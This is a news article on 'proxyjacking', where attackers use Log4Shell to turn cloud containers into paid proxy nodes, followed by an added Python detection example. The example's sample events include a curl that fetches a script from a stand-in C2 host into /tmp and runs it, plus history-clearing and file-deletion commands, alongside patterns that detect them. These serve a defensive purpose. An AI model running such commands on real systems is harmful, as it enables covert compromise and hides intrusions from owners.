    Proxyjacking has become a profitable business for cybercriminals

    The Sysdig Threat Research Team has discovered a new attack vector based on the interception of legitimate proxy services that allow people to sell part of their bandwidth to third parties.

    Sysdig researchers said that a new attack vector called "proxyjacking" allows cybercriminals to earn hundreds of thousands of dollars a month in the form of passive income.

    According to Kaspersky Lab, proxy services work like this: The user installs a client that creates a proxy server. The client makes the Internet connection of the device available to an external party - a proxy service, which then resells part of the user's bandwidth to other people.

    Proxy services are popular with people who want to use someone else's IP address to bypass geoblocks or view dubious websites without the traffic being tied to their own IP address. Usually, people pay per IP address based on the number of hours the application is running.

    In one of the attacks observed by Sysdig researchers, attackers compromised a container in the cloud using a Log4j vulnerability (Log4Shell) and then installed a proxy client that turned the system into a proxy server without the knowledge of the container owner. The attacker then sold the IP address of the compromised device to a proxy service.

    Typically, Log4j attacks involve a hacker downloading a backdoor or cryptojacking payload onto a device. Crystal Morin, threat research engineer at Sysdig, said that proxyjacking is similar to cryptojacking in that they both benefit from the victim's bandwidth - and both are about equally beneficial to the attacker. However, the two attacks differ in that the miner uses CPU resources, while proxyjacking uses network resources, with minimal CPU load.

    Morin noted that the impact of proxyjacking on the system is negligible: 1 GB of network traffic distributed over the course of a month amounts to tens of megabytes per day - it is very likely that the attack will go unnoticed.

    In the discovered attack, hackers compromised an unpatched Apache Solr service running on Kubernetes infrastructure in order to take control of a container in the environment. The cybercriminals then downloaded a malicious script from the C2 server and placed it in the "/tmp" folder in order to be able to use the compromised module to make money.

    The researchers noticed that the attackers tried to cover up traces of malicious activity by clearing the history and deleting the downloaded binary file, as well as temporary files.
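
    One way to look for the behaviour described in the two paragraphs above (a script fetched into "/tmp", followed by deletion of files and history clearing), as an added example that is not part of the original article or of Sysdig's tooling. The event format, the command-line patterns and the sample events are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed process-execution events: (container, command line).
# Names, paths and hosts are illustrative, not taken from the Sysdig report.
EVENTS = [
    ("solr-7d9f", "java -jar start.jar --module=http"),
    ("solr-7d9f", "curl -s -o /tmp/p.sh http://c2.example.invalid/p.sh"),
    ("solr-7d9f", "sh /tmp/p.sh"),
    ("solr-7d9f", "rm -f /tmp/p.sh /tmp/pclient"),
    ("solr-7d9f", 'sh -c "history -c; rm -f /root/.bash_history"'),
    ("web-55c1", "curl -s http://localhost:8080/healthz"),
    ("web-55c1", "rm -rf /tmp/cache-1234"),
    ("batch-01", "wget -q -O /tmp/data.csv http://reports.example.invalid/data.csv"),
]

# The behaviours the article names, expressed as assumed command-line patterns.
RULES = {
    "download_to_tmp": re.compile(r"\b(?:curl|wget)\b.*\s/tmp/\S+"),
    "exec_from_tmp": re.compile(r"^(?:(?:sh|bash)\s+)?/tmp/\S+"),
    "delete_in_tmp": re.compile(r"\brm\b.*\s/tmp/\S+"),
    "history_cleared": re.compile(r"\bhistory\s+-c\b|\brm\b.*_history\b"),
}
CLEANUP = {"delete_in_tmp", "history_cleared"}

def classify(cmdline):
    """Return the names of every rule the command line matches."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]

def find_suspects(events):
    """Flag containers where a download into /tmp is later followed by cleanup.

    Either behaviour alone is common in healthy workloads, so only the ordered
    combination inside one container is reported.
    """
    seen = defaultdict(list)  # container -> behaviour names in event order
    for container, cmdline in events:
        seen[container].extend(classify(cmdline))
    suspects = {}
    for container, names in seen.items():
        if "download_to_tmp" not in names:
            continue
        later = names[names.index("download_to_tmp") + 1:]
        if CLEANUP.intersection(later):
            suspects[container] = names
    return suspects

if __name__ == "__main__":
    for container, names in find_suspects(EVENTS).items():
        print(container, "->", ", ".join(names))
```

    Because `history -c` is a shell builtin, it is visible only when the audit source records the command line of the invoking shell, which is why the history rule also matches removal of a history file.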

    Researchers estimate that for 24 hours of activity from a single hacked IP address, an attacker can earn $9.60 per month. Experts noted that if 100 IP addresses are compromised, a cybercriminal can earn passive income of almost $1,000 per month.

    When Log4j is exploited on unpatched systems, this figure could be even higher, as millions of servers are still running vulnerable versions of the logging tool, and according to Censys, more than 23,000 of them are reachable from the internet. “Theoretically, the Log4j vulnerability alone could bring an attacker more than $220,000 in profit per month,” Morin said.

    To avoid huge bills for using proxies, organizations should set billing limits and verification tool alerts, the researchers say.

    Author DeepWeb